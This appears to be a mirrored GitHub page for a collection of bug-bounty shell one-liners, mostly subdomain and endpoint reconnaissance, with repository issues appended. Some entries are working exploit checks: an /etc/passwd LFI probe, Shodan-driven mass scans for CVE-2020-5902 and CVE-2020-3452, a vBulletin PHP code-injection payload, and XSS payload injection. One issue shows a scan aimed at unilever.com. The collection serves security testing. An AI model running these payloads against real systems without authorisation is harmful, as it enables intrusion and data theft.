Giter Site home page Giter Site logo

dwisiswant0 / awesome-oneliner-bugbounty Goto Github PK

View Code? Open in Web Editor NEW
2.4K 77.0 549.0 69 KB

A collection of awesome one-liner scripts especially for bug bounty tips.

License: MIT License

bugbounty bugbountytips bash one-liners awesome bug-bounty liner-scripts recon hacktoberfest

awesome-oneliner-bugbounty's Introduction

Awesome One-liner Bug Bounty Awesome

A collection of awesome one-liner scripts especially for bug bounty.

This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.

Definitions

This section defines specific terms or placeholders that are used throughout one-line command/scripts.

  • 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.
  • 1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file.
  • 2.1. "URL" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.
  • 2.2. "URLS.txt" contains criteria 2.1 with more than one in file.
  • 3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script according to its context and needs.
  • 4.1. "OUT.txt" or "OUT{N}.txt" means the file as the target storage result will be the command that is executed.

Local File Inclusion

@dwisiswant0

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Open-redirect

@dwisiswant0

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

@N3T_hunt3r

cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

XSS

@cihanmehmet

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt

@fanimalikhack

waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

@oliverrickfors

cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

Prototype Pollution

@R0X4R

subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

CVE-2020-5902

@Madrobot_

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

CVE-2020-3452

@vict0ni

while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt

CVE-2022-0378

@7h3h4ckv157

cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done

vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution

@Madrobot_

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

Find JavaScript Files

@D0cK3rG33k

assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done

Extract Endpoints from JavaScript

@renniepak

cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

Get CIDR & Org Information from Target Lists

@steve_mcilwain

for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done

Get Subdomains from RapidDNS.io

@andirrahmani1

curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from BufferOver.run

@_ayoubfathi_

curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u

@AnubhavSingh_

export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"

Get Subdomains from Riddler.io

@pikpikcu

curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from VirusTotal

@pikpikcu

curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomain with cyberxplore

@pikpikcu

curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 

Get Subdomains from CertSpotter

@caryhooper

curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from Archive

@pikpikcu

curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC

@pikpikcu

curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails

@pikpikcu

curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u

Bruteforcing Subdomain using DNS Over

@pikpikcu

while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt

Get Subdomains With sonar.omnisint.io

@pikpikcu

curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

Get Subdomains With synapsint.com

@pikpikcu

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u 

Get Subdomains from crt.sh

@vict0ni

curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from Recon.dev

@stokfedrik

curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent

Subdomain Bruteforcer with FFUF

@GochaOqradze

ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'

Find Allocated IP Ranges for ASN from IP Address

wains.be

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File

@emenalf

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

Ports Scan without CloudFlare

@dwisiswant0

subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

Create Custom Wordlists

@tomnomnom

gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' FILE1.txt
cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt  

Extracts Juicy Informations

@Prial Islam Khan

for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt  ;done

Find Subdomains TakeOver

@hahwul

subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 

Dump Custom URLs from ParamSpider

@hahwul

cat HOSTS.txt | xargs -I % python3 paramspider.py -l high -o ./OUT/% -d %;

URLs Probing with cURL + Parallel

@akita_zen

cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

Dump In-scope Assets from chaos-bugbounty-list

@dwisiswant0

curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'

Dump In-scope Assets from bounty-targets-data

@dwisiswant0

HackerOne Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

BugCrowd Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Intigriti Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

YesWeHack Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

HackenProof Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

Federacy Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Dump URLs from sitemap.xml

@healthyoutlet

curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Pure Bash Linkfinder

@ntrzz

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt

Extract Endpoints from swagger.json

@zer0pwn

curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'

CORS Misconfiguration

@manas_hunter

site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done

Find Hidden Servers and/or Admin Panels

@rez0__

ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt 

Recon Using api.recon.dev

@z0idsec

curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=HOST | jg .[].domain

Find Live Host/Domain/Assets

@YashGoti

subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

XSS without gf

@HacktifyS

waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done

Get Subdomains from IPs

@laughface809

python3 hosthunter.py HOSTS.txt > OUT.txt

Gather Domains from Content-Security-Policy

@geeknik

curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" |  sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u

Nmap IP:PORT Parser Piped to HTTPX

@dwisiswant0

nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent

awesome-oneliner-bugbounty's People

Contributors

alishahmughal123 avatar bellabeen avatar cimihan123 avatar clevercoder91 avatar dn0m1n8tor avatar dwisiswant0 avatar fanimalikhack avatar geeknik avatar hahwul avatar laughface809 avatar pikpikcu avatar r0x4r avatar victoni avatar xalfie avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

awesome-oneliner-bugbounty's Issues

Search Asn Amass

@OFJAAAH
@b51b5b43

amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500

parallel

where I can find parallel and what its does actually

New XSS Command Suggestion

XSS Command

You can add the following useful commands to the list.

gospider -s http://testphp.vulnweb.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|swf|js)" --other-source | grep -e "code-200" | awk '{print $5}'|grep "testphp.vulnweb.com" | grep "=" | qsreplace -a |dalfox pipe -o dalfox.txt
gospider -s http://testphp.vulnweb.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|swf|js)" --other-source | grep -e "code-200" | awk '{print $5}'|grep "testphp.vulnweb.com" | grep "=" | qsreplace -a |qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'
gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt,swf,js testphp.vulnweb.com --mc 200,500 --fp|grep "=" | qsreplace -a |dalfox pipe -o dalfox.txt
gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt,swf,js testphp.vulnweb.com --mc 200,500 --fp|grep "=" | qsreplace -a |qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'
gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt,swf,js testphp.vulnweb.com|grep '='|nilo|qsreplace -a |qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not

1

2

xss

gospider -s "https://unilever.com" -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt

_..._

.' .::::. __ _ _ ___ _ __ __
: :::::::: | \ / \ | | | / \ V /
: :::::::: | o ) o || |
| _( o )) (
'. '::::::' |
/|n||_||| _//n\
'-.::''

Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[] Using pipeline mode
output file error (file)
output file error (write)
[
] Loaded 18 target urls
output file error (file)
output file error (write)
[] Target URL: https://www.unilever.com/search.html?search=ben+and+jerry%27s
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/search.html?search=ben+and+jerry%27s: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://www.unilever.com/search.html?contenttype=&from=&global=false&id=&search=coupons&to=
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/search.html?contenttype=&from=&global=false&id=&search=coupons&to=: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[] Target URL: https://www.unilever.com/?navids=tcm%3a244-67568-4%2ctcm%3a244-67577-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/?navids=tcm%3a244-67568-4%2ctcm%3a244-67577-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://twitter.com/share?text=sustainable+living&url=https%3a%2f%2fwww.unilever.com%2fsustainable-living%2foverview%2f
output file error (file)
output file error (write)
[E] not running Get https://twitter.com/share?text=sustainable+living&url=https%3a%2f%2fwww.unilever.com%2fsustainable-living%2foverview%2f: dial tcp: lookup twitter.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[] Target URL: https://www.facebook.com/login.php?api_key=966242223397117&cancel_url=https%3a%2f%2fwww.facebook.com%2fdialog%2fclose_window%2f%3fapp_id%3d966242223397117%26connect%3d0%23_%3d_&display=popup&locale=en_us&next=https%3a%2f%2fwww.facebook.com%2fsharer%2fsharer.php%3fu%3dhttps%253a%252f%252fwww.unilever.com%252fsustainable-living%252foverview%252f&signed_next=1&skip_api_login=1
output file error (file)
output file error (write)
[E] not running Get https://www.facebook.com/login.php?api_key=966242223397117&cancel_url=https%3a%2f%2fwww.facebook.com%2fdialog%2fclose_window%2f%3fapp_id%3d966242223397117%26connect%3d0%23_%3d_&display=popup&locale=en_us&next=https%3a%2f%2fwww.facebook.com%2fsharer%2fsharer.php%3fu%3dhttps%253a%252f%252fwww.unilever.com%252fsustainable-living%252foverview%252f&signed_next=1&skip_api_login=1: dial tcp: lookup www.facebook.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://twitter.com/share?url=https%3a%2f%2fwww.unilever.com%2fsustainable-living%2foverview%2f
output file error (file)
output file error (write)
[E] not running Get https://twitter.com/share?url=https%3a%2f%2fwww.unilever.com%2fsustainable-living%2foverview%2f: dial tcp: lookup twitter.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[] Target URL: https://twitter.com/share?lang=de&url=https%3a%2f%2fwww.unilever.com%2fsustainable-living%2foverview%2f
output file error (file)
output file error (write)
[E] not running Get https://twitter.com/share?lang=de&url=https%3a%2f%2fwww.unilever.com%2fsustainable-living%2foverview%2f: dial tcp: lookup twitter.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://www.unilever.com/sustainable-living/enhancing-livelihoods/fairness-in-the-workplace/advancing-human-rights-in-our-extended-supply-chain/?navids=tcm%3a244-50553-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/sustainable-living/enhancing-livelihoods/fairness-in-the-workplace/advancing-human-rights-in-our-extended-supply-chain/?navids=tcm%3a244-50553-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[] Target URL: https://www.unilever.com/about/suppliers-centre/terms-and-conditions/?navids=tcm%3a244-67568-4%2ctcm%3a244-67573-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/about/suppliers-centre/terms-and-conditions/?navids=tcm%3a244-67568-4%2ctcm%3a244-67573-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://www.unilever.com/sustainable-living/enhancing-livelihoods/fairness-in-the-workplace/advancing-human-rights-in-our-extended-supply-chain/our-responsible-sourcing-policy-in-action/?navids=tcm%3a244-67568-4%2ctcm%3a244-67571-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/sustainable-living/enhancing-livelihoods/fairness-in-the-workplace/advancing-human-rights-in-our-extended-supply-chain/our-responsible-sourcing-policy-in-action/?navids=tcm%3a244-67568-4%2ctcm%3a244-67571-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[] Target URL: https://www.unilever.com/investor-relations/debt-investors/unilever-us-shelf-registration/?navids=tcm%3a244-50553-4%2ctcm%3a244-50719-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/investor-relations/debt-investors/unilever-us-shelf-registration/?navids=tcm%3a244-50553-4%2ctcm%3a244-50719-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://www.unilever.com/brands/personal-care/glow-and-lovely.html?navids=tcm%3a244-67568-4%2ctcm%3a244-67574-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/brands/personal-care/glow-and-lovely.html?navids=tcm%3a244-67568-4%2ctcm%3a244-67574-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[] Target URL: https://www.unilever.com/brands/personal-care/glow-and-lovely.html?currentlocation=true
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/brands/personal-care/glow-and-lovely.html?currentlocation=true: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://www.unilever.com/investor-relations/agm-and-corporate-governance/other-governance-information/?navids=tcm%3a244-50553-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/investor-relations/agm-and-corporate-governance/other-governance-information/?navids=tcm%3a244-50553-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[] Target URL: https://www.unilever.com/investor-relations/agm-and-corporate-governance/agm-and-voting/agm-archive/?navids=tcm%3a244-50553-4%2ctcm%3a244-50554-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/investor-relations/agm-and-corporate-governance/agm-and-voting/agm-archive/?navids=tcm%3a244-50553-4%2ctcm%3a244-50554-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://www.unilever.com/investor-relations/agm-and-corporate-governance/agm-and-voting/agm-archive/?page=3
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/investor-relations/agm-and-corporate-governance/agm-and-voting/agm-archive/?page=3: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[] Target URL: https://www.unilever.com/investor-relations/agm-and-corporate-governance/other-governance-information/directors-sharedealings/?navids=tcm%3a244-67568-4%2ctcm%3a244-67577-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/investor-relations/agm-and-corporate-governance/other-governance-information/directors-sharedealings/?navids=tcm%3a244-67568-4%2ctcm%3a244-67577-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)
[
] Target URL: https://www.unilever.com/investor-relations/agm-and-corporate-governance/other-governance-information/remuneration/?navids=tcm%3a244-67568-4%2ctcm%3a244-67574-4
output file error (file)
output file error (write)
[E] not running Get https://www.unilever.com/investor-relations/agm-and-corporate-governance/other-governance-information/remuneration/?navids=tcm%3a244-67568-4%2ctcm%3a244-67574-4: dial tcp: lookup www.unilever.com on [::1]:53: dial udp [::1]:53: socket: permission denied
output file error (file)
output file error (write)

cant figure where it went wrong

welp !!

almost a lot of exploits need maintaince

show

xargs: unmatched single quote; by default quotes are special to xargs unless you use the -0 option

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.